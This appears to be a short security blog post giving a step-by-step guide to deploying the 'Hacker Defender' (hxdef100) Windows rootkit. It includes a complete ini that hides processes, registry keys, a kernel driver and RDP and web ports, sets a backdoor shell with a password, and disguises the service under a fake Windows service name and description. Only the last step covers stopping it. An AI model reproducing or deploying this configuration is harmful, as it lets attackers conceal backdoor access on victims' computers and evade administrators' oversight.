Information Security

[HackTool] hxdef100

1. 개요

This tool can hidden task services, regKeys, ports(network).

 

2. Download

hxdef100.zip
unzip and move C:\

 

3. edit hxdef100.ini

[Hidden Table]
hxdef*
rcmd.exe
iexplore.exe

[Root Processes]
hxdef*
rcmd.exe

[Hidden Services]
NetDDEesm
       
[Hidden RegKeys]
NetDDEesm
LEGACY_NetDDEesm
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100
           
[Hidden RegValues]
          
[Startup Run]

[Free Space]

[Hidden Ports]
TCP:80,3389
UDP:445,500,1025,1049,4500,123

[Settings]  
Password=hxdef-rulez
BackdoorShell=hxdefß$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=NetDDEesm
ServiceDisplayName=Network DDE ESM
ServiceDescription=DDE 네트워크 연결에 대한 종합 정보를 관리합니다. 서비스를 중지하면, DDE 네트워크 종합 보고를 사용할 수 없습니다. 서비스를 사용하지 않도록 설정하면, 관련된 모든 서비스를 사용할 수 없습니다.
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys

 

4. run hxdef100.exe

Run cmd.exe and change directory “C:\hxdef100”
hxdef100.exe hxdef100.ini

 

5. kill hxdef100.exe

Run cmd
sc stop [ServiceName]
=> Then you can refind C:\hexdef100\hdef100.exe and ini file

Back To Top